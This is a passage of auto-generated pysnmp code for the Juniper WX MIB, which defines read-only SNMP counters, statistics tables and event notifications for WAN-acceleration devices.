jnxWxSysStatsPktSizeIn6 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeIn6.setStatus('current')
jnxWxSysStatsPktSizeOut1 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut1.setStatus('current')
jnxWxSysStatsPktSizeOut2 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut2.setStatus('current')
jnxWxSysStatsPktSizeOut3 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut3.setStatus('current')
jnxWxSysStatsPktSizeOut4 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut4.setStatus('current')
jnxWxSysStatsPktSizeOut5 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut5.setStatus('current')
jnxWxSysStatsPktSizeOut6 = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 4, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxSysStatsPktSizeOut6.setStatus('current')
jnxWxAsm = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5))
if mibBuilder.loadTexts: jnxWxAsm.setStatus('current')
jnxWxAsmTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1), )
if mibBuilder.loadTexts: jnxWxAsmTable.setStatus('current')
jnxWxAsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"))
if mibBuilder.loadTexts: jnxWxAsmEntry.setStatus('current')
jnxWxAsmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxAsmIndex.setStatus('current')
jnxWxAsmIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 1, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmIpAddress.setStatus('current')
jnxWxAsmStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2), )
if mibBuilder.loadTexts: jnxWxAsmStatsTable.setStatus('current')
jnxWxAsmStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1), )
jnxWxAsmEntry.registerAugmentions(("JUNIPER-WX-MIB", "jnxWxAsmStatsEntry"))
jnxWxAsmStatsEntry.setIndexNames(*jnxWxAsmEntry.getIndexNames())
if mibBuilder.loadTexts: jnxWxAsmStatsEntry.setStatus('current')
jnxWxAsmStatsPktsIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsPktsIn.setStatus('current')
jnxWxAsmStatsPktsOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsPktsOut.setStatus('current')
jnxWxAsmStatsBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsBytesIn.setStatus('current')
jnxWxAsmStatsBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 2, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAsmStatsBytesOut.setStatus('current')
jnxWxVirtEndptTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3), )
if mibBuilder.loadTexts: jnxWxVirtEndptTable.setStatus('current')
jnxWxVirtEndptEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxVirtEndptIndex"))
if mibBuilder.loadTexts: jnxWxVirtEndptEntry.setStatus('current')
jnxWxVirtEndptIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxVirtEndptIndex.setStatus('current')
jnxWxVirtEndptName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1, 2), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxVirtEndptName.setStatus('current')
jnxWxVirtEndptSubnetCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxVirtEndptSubnetCount.setStatus('current')
jnxWxApp = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6))
if mibBuilder.loadTexts: jnxWxApp.setStatus('current')
jnxWxAppTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1), )
if mibBuilder.loadTexts: jnxWxAppTable.setStatus('current')
jnxWxAppEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAppIndex"))
if mibBuilder.loadTexts: jnxWxAppEntry.setStatus('current')
jnxWxAppIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxAppIndex.setStatus('current')
jnxWxAppAppName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1, 1, 2), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAppName.setStatus('current')
jnxWxAppStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2), )
if mibBuilder.loadTexts: jnxWxAppStatsTable.setStatus('current')
jnxWxAppStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"), (0, "JUNIPER-WX-MIB", "jnxWxAppIndex"))
if mibBuilder.loadTexts: jnxWxAppStatsEntry.setStatus('current')
jnxWxAppStatsBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesIn.setStatus('current')
jnxWxAppStatsBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesOut.setStatus('current')
jnxWxAppStatsBytesInPercent = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesInPercent.setStatus('current')
jnxWxAppStatsAppName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 4), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsAppName.setStatus('current')
jnxWxAppStatsAccelBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsAccelBytesIn.setStatus('current')
jnxWxAppStatsActiveSessionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsActiveSessionTime.setStatus('current')
jnxWxAppStatsEstBoostBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsEstBoostBytes.setStatus('current')
jnxWxAppStatsBytesOutWxc = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesOutWxc.setStatus('current')
jnxWxAppAggrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3), )
if mibBuilder.loadTexts: jnxWxAppAggrStatsTable.setStatus('current')
jnxWxAppAggrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1), )
jnxWxAppEntry.registerAugmentions(("JUNIPER-WX-MIB", "jnxWxAppAggrStatsEntry"))
jnxWxAppAggrStatsEntry.setIndexNames(*jnxWxAppEntry.getIndexNames())
if mibBuilder.loadTexts: jnxWxAppAggrStatsEntry.setStatus('current')
jnxWxAppAggrStatsBytesInRe = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAggrStatsBytesInRe.setStatus('current')
jnxWxAppAggrStatsBytesOutRe = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAggrStatsBytesOutRe.setStatus('current')
jnxWxAppAggrStatsBytesInPercent = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAggrStatsBytesInPercent.setStatus('current')
jnxWxWanStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4), )
if mibBuilder.loadTexts: jnxWxWanStatsTable.setStatus('current')
jnxWxWanStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"), (0, "JUNIPER-WX-MIB", "jnxWxAppIndex"))
if mibBuilder.loadTexts: jnxWxWanStatsEntry.setStatus('current')
jnxWxWanStatsBytesToWan = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWanStatsBytesToWan.setStatus('current')
jnxWxWanStatsBytesFromWan = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWanStatsBytesFromWan.setStatus('current')
jnxWxAccelAppNameTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5), )
if mibBuilder.loadTexts: jnxWxAccelAppNameTable.setStatus('current')
jnxWxAccelAppNameEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAccelAppIndex"))
if mibBuilder.loadTexts: jnxWxAccelAppNameEntry.setStatus('current')
jnxWxAccelAppIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxAccelAppIndex.setStatus('current')
jnxWxAccelAppName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5, 1, 2), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAccelAppName.setStatus('current')
jnxWxAccelAppStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6), )
if mibBuilder.loadTexts: jnxWxAccelAppStatsTable.setStatus('current')
jnxWxAccelAppStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"), (0, "JUNIPER-WX-MIB", "jnxWxAccelAppIndex"))
if mibBuilder.loadTexts: jnxWxAccelAppStatsEntry.setStatus('current')
jnxWxAccelAppTimeWithAccel = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6, 1, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAccelAppTimeWithAccel.setStatus('current')
jnxWxAccelAppTimeWithoutAccel = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6, 1, 4), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAccelAppTimeWithoutAccel.setStatus('current')
jnxWxBurstStats = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7))
if mibBuilder.loadTexts: jnxWxBurstStats.setStatus('current')
jnxWxBurstStatsStartTime = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsStartTime.setStatus('current')
jnxWxBurstStatsBpsIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsBpsIn.setStatus('current')
jnxWxBurstStatsBpsOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsBpsOut.setStatus('current')
jnxWxBurstStatsBpsPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsBpsPt.setStatus('current')
jnxWxQos = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10))
if mibBuilder.loadTexts: jnxWxQos.setStatus('current')
jnxWxQosEndptTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1), )
if mibBuilder.loadTexts: jnxWxQosEndptTable.setStatus('current')
jnxWxQosEndptEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxQosEndptIndex"))
if mibBuilder.loadTexts: jnxWxQosEndptEntry.setStatus('current')
jnxWxQosEndptIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxQosEndptIndex.setStatus('current')
jnxWxQosEndptIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1, 1, 2), TcQosIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosEndptIdentifier.setStatus('current')
jnxWxQosClassTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2), )
if mibBuilder.loadTexts: jnxWxQosClassTable.setStatus('current')
jnxWxQosClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxQosClassIndex"))
if mibBuilder.loadTexts: jnxWxQosClassEntry.setStatus('current')
jnxWxQosClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxQosClassIndex.setStatus('current')
jnxWxQosClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2, 1, 2), TcQosIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosClassName.setStatus('current')
jnxWxQosStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3), )
if mibBuilder.loadTexts: jnxWxQosStatsTable.setStatus('current')
jnxWxQosStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxQosEndptIndex"), (0, "JUNIPER-WX-MIB", "jnxWxQosClassIndex"))
if mibBuilder.loadTexts: jnxWxQosStatsEntry.setStatus('current')
jnxWxQosStatsBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsBytesIn.setStatus('current')
jnxWxQosStatsBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsBytesOut.setStatus('current')
jnxWxQosStatsBytesDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsBytesDropped.setStatus('current')
jnxWxQosStatsPktsIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsPktsIn.setStatus('current')
jnxWxQosStatsPktsOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsPktsOut.setStatus('current')
jnxWxQosStatsPktsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsPktsDropped.setStatus('current')
jnxWxWanPerf = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14))
if mibBuilder.loadTexts: jnxWxWanPerf.setStatus('current')
jnxWxWpEndptTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1), )
if mibBuilder.loadTexts: jnxWxWpEndptTable.setStatus('current')
jnxWxWpEndptEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxWpEndptIndex"))
if mibBuilder.loadTexts: jnxWxWpEndptEntry.setStatus('current')
jnxWxWpEndptIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxWpEndptIndex.setStatus('current')
jnxWxWpEndptIp = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpEndptIp.setStatus('current')
jnxWxWpStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2), )
if mibBuilder.loadTexts: jnxWxWpStatsTable.setStatus('current')
jnxWxWpStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxWpEndptIndex"))
if mibBuilder.loadTexts: jnxWxWpStatsEntry.setStatus('current')
jnxWxWpStatsLatencyThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyThresh.setStatus('current')
jnxWxWpStatsAvgLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 4), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsAvgLatency.setStatus('current')
jnxWxWpStatsLatencyCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 5), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyCount.setStatus('current')
jnxWxWpStatsLatencyAboveThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 6), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyAboveThresh.setStatus('current')
jnxWxWpStatsLatencyAboveThreshCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 7), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyAboveThreshCount.setStatus('current')
jnxWxWpStatsLossPercent = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 8), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLossPercent.setStatus('current')
jnxWxWpStatsLossCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLossCount.setStatus('current')
jnxWxWpStatsEventCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 10), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsEventCount.setStatus('current')
jnxWxWpStatsDiversionCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 11), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsDiversionCount.setStatus('current')
jnxWxWpStatsReturnCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 12), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsReturnCount.setStatus('current')
jnxWxWpStatsLastDown = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 13), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLastDown.setStatus('current')
jnxWxWpStatsUnavailableCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 14), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsUnavailableCount.setStatus('current')
jnxWxWpStatsMinuteCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 15), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsMinuteCount.setStatus('current')
jnxWxEventObjs = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 1))
if mibBuilder.loadTexts: jnxWxEventObjs.setStatus('current')
jnxWxEventEvents = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2))
if mibBuilder.loadTexts: jnxWxEventEvents.setStatus('current')
jnxWxEventEventsV2 = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0))
if mibBuilder.loadTexts: jnxWxEventEventsV2.setStatus('current')
jnxWxEventRipAuthFailure = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 1)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventRipAuthFailure.setStatus('current')
jnxWxEventCompressionBufferOverflow = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 2)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventCompressionBufferOverflow.setStatus('current')
jnxWxEventCompressionSessionClosed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 3)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventCompressionSessionClosed.setStatus('current')
jnxWxEventDecompressionSessionClosed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 4)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDecompressionSessionClosed.setStatus('current')
jnxWxEventCompressionSessionOpened = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 5)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventCompressionSessionOpened.setStatus('current')
jnxWxEventDecompressionSessionOpened = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 6)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDecompressionSessionOpened.setStatus('current')
jnxWxEventPrimaryRegServerUnreachable = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 7)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryRegServerUnreachable.setStatus('current')
jnxWxEventSecondaryRegServerUnreachable = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 8)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventSecondaryRegServerUnreachable.setStatus('current')
jnxWxEventMultiNodeMasterUp = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 9)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeMasterUp.setStatus('current')
jnxWxEventMultiNodeMasterDown = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 10)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeMasterDown.setStatus('current')
jnxWxEventMultiNodeLastUp = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 11)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeLastUp.setStatus('current')
jnxWxEventMultiNodeLastDown = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 12)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeLastDown.setStatus('current')
jnxWxEventPrimaryDownBackupEngaged = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 13)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryDownBackupEngaged.setStatus('current')
jnxWxEventPrimaryDownBackupEngageFailed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 14)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryDownBackupEngageFailed.setStatus('current')
jnxWxEventPrimaryUpBackupDisengaged = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 15)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryUpBackupDisengaged.setStatus('current')
jnxWxEventMultiPathStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 16)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiPathStatusChange.setStatus('current')
jnxWxEventDiskFailure = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 17)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDiskFailure.setStatus('current')
jnxWxEventWanPerfStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 18)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
